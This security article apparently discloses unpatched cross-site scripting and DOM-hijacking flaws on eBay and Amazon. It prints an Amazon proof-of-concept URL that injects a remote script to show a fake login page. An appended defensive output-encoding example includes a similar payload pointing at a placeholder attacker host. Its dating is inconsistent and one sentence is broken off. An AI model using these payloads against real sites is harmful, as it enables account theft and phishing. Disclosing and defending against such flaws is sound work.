eBay And Amazon Still Vulnerable
January 4, 2022


With the holidays over and everyone heading back to work, many people are breathing a sigh of relief. With the holiday rush over and a new year ahead, you probably give no thought to the question "Was my online holiday shopping done safely and securely?". Unfortunately, the answer to this question could very well be no. Despite millions and millions of dollars being spent each and every year by big name online ecommerce outfits, a good number still remain vulnerable to security flaws.


False Sense Of Security
It seems that a lot of the trust put into these websites comes from the company's reputation. For example: you would probably feel a lot safer about doing your online shopping at amazon.com as opposed to thelocalcornerstore.com, and it is this type of trust that could cause you problems.

Last year GulfTech Security Research found several security flaws in eBay and the eBay-owned half.com. These security flaws could allow attackers to execute malicious code in the context of a victim's browser, and could easily be used to hijack accounts and in phishing and other scams. Unfortunately, only some of those security flaws were fixed, and the most dangerous of the bunch still remain even after being made public. Additionally, GulfTech Security Research found similar security vulnerabilities in the well known amazon.com website. Like the eBay flaws, the amazon.com vulnerabilities still exist.


Should I Be Worried?
If you make use of eBay or amazon.com, you could be put at risk simply by visiting a link or viewing a malicious web page. The eBay vulnerability is an especially nasty one because all an attacker has to do in order to acquire victims is place an auction or fill out their "about me" page with malicious data. Once the malicious auction is placed, a victim's cookie-based credentials can be stolen silently, and even worse, an attacker can hijack certain Document Object Model elements and cause anyone who clicks on the "place bid" button to be redirected to a bogus login page or worse. Below is an example "about me" page put together by us that demonstrates how this vulnerability could be used for phishing.

http://members.ebay.com/ws/eBayISAPI.dll?ViewUserPage&userid=jahmin79

If the above link does not work properly for you, then you can see screenshots of the vulnerability being exploited by visiting one of the following links.

http://images.gulftech.org/domhijackebay.jpg
http://images.gulftech.org/domhijackedebay.jpg


eBay is not the only big name with security problems, though. As we mentioned earlier, amazon.com is still vulnerable to an issue GulfTech Security Research discovered and made public many months ago. The vulnerability in Amazon is a little different, but allows for similar results. GulfTech Security Research has provided a Proof Of Concept for this issue. It is buggy, but it is not meant to steal your information, just to show you that the issue does exist and can be exploited.
http://www.amazon.com/exec/obidos/ASIN/B00009TB5G/%22%3E%22;//--%3E%3C/script%3E
%3Cscript%20src=http://tmp.gulftech.org/amazon.js%3E%3C/script%3Eref=pd_cpt_gw_1
/002-2134680-7978406
The above link would replace the amazon.com page with an attacker's page, which in this case is a fake amazon.com login page. Below are screenshots of the issue in action.

http://images.gulftech.org/amazona.jpg
http://images.gulftech.org/amazonb.jpg


The issue in Amazon seems to be with the handling of user-supplied data passed to the reviews and suggestion box feature. Pages with this feature present are probably vulnerable.


When Will it Be Fixed?
Unfortunately, it seems that with some large companies, things tend to get overlooked. All of the issues mentioned here have been public for some time. No one knows for sure when, or if, these holes will be patched, but let's hope it gets done before they are exploited to take advantage of the end users. filtering all inputted data for DOM references along with javascript and frames.
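
The following is an added example, not code from the original article, from GulfTech, or from either site. It shows the server-side counterpart to the filtering mentioned above: encoding a reflected URL path segment for each place it is written into a page, so that a payload shaped like the Amazon proof of concept stays inert data. The function names are hypothetical and the payload is constructed, with a placeholder host.

```javascript
// Added example: context-aware output encoding for reflected request data.
// All function names are hypothetical; nothing here is either site's real code.

// HTML text / quoted-attribute context: neutralise the characters that can
// close an attribute value or open a new tag.
function encodeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Inline <script> context: JSON.stringify escapes quotes and backslashes, but
// the HTML tokenizer still reacts to "</script>" and "-->" inside a string,
// so <, >, & and the JS line separators are emitted as \uXXXX escapes.
function encodeForScript(value) {
  return JSON.stringify(String(value)).replace(
    /[<>&\u2028\u2029]/g,
    (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0')
  );
}

// A page fragment that reflects one path segment into three different
// contexts, each with the encoder that matches the context.
function renderProductPage(pathSegment) {
  return [
    '<a href="/review?ref=' + encodeURIComponent(pathSegment) + '">Write a review</a>',
    '<input name="ref" value="' + encodeHtml(pathSegment) + '">',
    '<script>var ref = ' + encodeForScript(pathSegment) + ';</script>',
  ].join('\n');
}

// Constructed payload with the same shape as the path segment in the proof of
// concept: it tries to close an attribute, a JS string, an HTML comment and
// the current script block, then load a remote script (placeholder host).
const payload = decodeURIComponent(
  '%22%3E%22;//--%3E%3C/script%3E%3Cscript%20src=https://attacker.example/x.js%3E%3C/script%3E'
);

console.log(renderProductPage(payload));
```

Only the page's own script element survives in the rendered output; the reflected value appears as percent-encoded, entity-encoded or `\u`-escaped text depending on the context.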


References
Document Object Model Hijacking Explained
http://www.gulftech.org/?node=article&article_id=00055-12182004

When Small Mistakes Cause Big Problems
http://www.gulftech.org/?node=article&article_id=00050-09182004